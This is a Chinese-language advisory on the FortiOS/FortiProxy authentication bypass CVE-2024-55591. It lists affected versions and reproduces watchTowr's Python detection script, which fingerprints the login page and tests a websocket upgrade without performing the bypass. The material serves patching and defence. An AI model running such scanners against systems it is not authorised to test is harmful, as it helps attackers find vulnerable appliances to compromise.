0x00 前言
FortiOS是美国飞塔(Fortinet)公司开发的一套专用于FortiGate网络安全平台上的安全操作系统,FortiOS本身就具有多种功能,防火墙、IPSec VPN、SSL-VPN、IPS、防病毒、Web过滤、反垃圾邮件和应用控制(即时通讯和P2P),以及带宽控制。
0x01 漏洞描述
该漏洞属于身份认证绕过:未经身份验证的远程攻击者可以向设备管理界面中的 Node.js websocket 模块发送特制请求,成功利用后可获得超级管理员(super-admin)权限。
0x02 CVE编号
CVE-2024-55591
0x03 影响版本
7.0.0 <= FortiOS 7.0.* <= 7.0.16
7.0.0 <= FortiProxy 7.0.* <= 7.0.19
7.2.0 <= FortiProxy 7.2.* <= 7.2.12
0x04 漏洞详情
POC(watchTowr 公开的检测脚本:仅依据登录页特征与 websocket 升级响应判断目标是否疑似受影响,并不执行实际的认证绕过):
https://github.com/watchtowrlabs/fortios-auth-bypass-check-CVE-2024-55591
import requests
import random
from uuid import uuid4
from datetime import datetime, timedelta
import argparse
# Tool banner printed by main(). The ASCII art appears to have been mangled when
# this listing was copied, and the literal is not a raw string, so sequences such
# as `\/`, `\_` and `\ ` are invalid escapes (kept verbatim by CPython, but they
# raise SyntaxWarning on 3.12+) while the `\n` on the fourth art line is a real
# newline escape. Left untouched because the literal is runtime output.
banner = """
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \\| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \\___| Y | |( <_> \ / | | \n \/\_/ (____ |__| \\\___ |___|__|__ | \\__ / \/\_/ |__|
\ \ \
CVE-2024-55591.py
(*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) vulnerable detection by watchTowr
- Sonny , watchTowr ([email protected])
- Aliz Hammond, watchTowr ([email protected])
CVEs: [CVE-2024-55591]
"""
def generate_random_suffix(length=6):
    """Return a string of ``length`` pseudo-random lowercase ASCII letters.

    Only used to vary the ``/watchTowr-<suffix>`` probe path; the value is not
    a secret, so the non-cryptographic ``random`` module is adequate here.
    """
    alphabet = 'abcdefghijklmnopqrstuvwxyz'
    return ''.join(random.choices(alphabet, k=length))
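def perform_web_interaction(target, port, *, verify=False, timeout=10):
    """
    Send the two requests the detection relies on and return the raw responses.

    Args:
        target (str): Target hostname or IP address. A bare IPv6 address is
            wrapped in brackets so the URL authority stays valid.
        port (int): Target HTTPS port.
        verify (bool | str): TLS verification setting handed to ``requests``
            (False, True, or a CA bundle path). Defaults to False because the
            appliance UI commonly presents a self-signed certificate; note that
            with verification off, anything in the network path could answer the
            probe, so the verdict is only as trustworthy as that path.
        timeout (float): Per-request timeout in seconds.

    Returns:
        tuple: ``(first_response, second_response)`` -- the ``requests.Response``
        for ``GET /login?redir=/ng`` (``requests`` follows redirects, so this is
        the final hop) and the response to a websocket upgrade request on a
        random ``/watchTowr-<suffix>`` path.

    Raises:
        requests.RequestException: On connection, TLS or timeout failures.

    Note:
        The probe path carries the literal ``watchTowr-`` prefix, so these
        requests are trivially identifiable in the target's access logs.
    """
    base_url = f"https://{_format_host(target)}:{port}"
    if not verify:
        # Suppress the InsecureRequestWarning each unverified request would otherwise emit.
        requests.packages.urllib3.disable_warnings(
            requests.packages.urllib3.exceptions.InsecureRequestWarning
        )
    # Step 1: the login page; the validator fingerprints the FortiOS web UI from it.
    first_url = f"{base_url}/login?redir=/ng"
    first_response = requests.get(first_url, verify=verify, timeout=timeout)
    # Step 2: ask an arbitrary (random) path to upgrade to a websocket; the
    # validator treats a 101 Switching Protocols here as the vulnerable-path indicator.
    second_url = f"{base_url}/watchTowr-{generate_random_suffix()}"
    upgrade_headers = {
        'Sec-WebSocket-Version': '13',
        'Sec-WebSocket-Key': 'thFz/fKwzu5wDEy0XO3fcw==',
        'Connection': 'keep-alive, Upgrade',
        'Upgrade': 'websocket',
    }
    second_response = requests.get(second_url, headers=upgrade_headers, verify=verify, timeout=timeout)
    return first_response, second_response


def _format_host(target):
    """Return ``target`` as a URL host component: bare IPv6 literals get brackets."""
    if ':' in target and not target.startswith('['):
        return f"[{target}]"
    return target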
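def validate_interaction_conditions(first_response, second_response):
    """
    Decide whether the two probe responses match the vulnerable-version fingerprint.

    The verdict is fingerprint based, not proof of exploitation: it combines
    markers of the FortiOS/FortiProxy web UI in the login page with a successful
    websocket upgrade on an arbitrary path. A True result therefore means
    "looks like an affected build that exposes the websocket path"; a False
    result can equally be caused by a WAF, a redirect or a customised UI.

    Args:
        first_response (requests.Response): Response to ``GET /login?redir=/ng``.
        second_response (requests.Response): Response to the websocket upgrade request.

    Returns:
        bool: True only when every check passes. A target that does not look
        like a FortiOS management interface is reported on stdout and yields
        False instead of terminating the process, so callers keep control.
    """
    try:
        first_body = first_response.text
        # The login page must be the FortiOS management UI; anything else is out of scope.
        if '<html class="main-app">' not in first_body:
            print("[!] Target is not a FortiOS Management Interface")
            return False
        # The warning-icon markup is a marker of the affected UI builds.
        warning_icon_present = '<f-icon class="fa-warning' in first_body
        if not warning_icon_present:
            print("[!] '<f-icon class=\"fa-warning\"' not found in response")
        checks = [
            first_response.status_code == 200,
            warning_icon_present,
            '</f-icon>' in first_body,
            # The admin session cookie name is a second UI fingerprint (normally in Set-Cookie).
            any('APSCOOKIE_' in str(value) for value in first_response.headers.values()),
            # 101 Switching Protocols on a random path is the vulnerable-path indicator.
            second_response.status_code == 101,
            # Connection header tokens are case-insensitive, so compare lower-cased
            # rather than requiring the exact spelling "Upgrade".
            'upgrade' in second_response.headers.get('Connection', '').lower(),
        ]
        return all(checks)
    except Exception as e:
        # Keep the CLI alive on malformed responses: report and treat as not vulnerable.
        print(f"[!] Error during validation: {e}")
        return False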
def main():
    """
    Command-line entry point: parse ``--target``/``--port``, run the probe, print a verdict.

    The verdict is only a fingerprint match (see validate_interaction_conditions);
    the tool never attempts the bypass itself. Errors are reported on stdout and
    no distinct exit status is set for a VULNERABLE verdict, so wrap the output
    rather than the return code when scripting this.
    """
    print(banner)
    cli = argparse.ArgumentParser(description='CVE-2024-55591 Detection Tool')
    cli.add_argument('--target', '-t', type=str, help='IP address of the target', required=True)
    cli.add_argument('--port', '-p', type=int, help='Port of the target', required=False, default=443)
    options = cli.parse_args()
    try:
        print(f"[*] Targeting: https://{options.target}:{options.port}")
        responses = perform_web_interaction(options.target, options.port)
        verdict = validate_interaction_conditions(*responses)
        message = (
            "[!] VULNERABLE: All conditions were met"
            if verdict
            else "[*] NOT VULNERABLE: Conditions were not satisfied"
        )
        print(message)
    except requests.RequestException as e:
        print(f"[!] Request error: {e}")
    except Exception as e:
        print(f"[!] Unexpected error: {e}")


if __name__ == "__main__":
    main()
0x05 参考链接
https://fortiguard.fortinet.com/psirt/FG-IR-24-535
原文始发于微信公众号(信安百科):CVE-2024-55591|FortiOS和FortiProxy身份认证绕过漏洞(POC)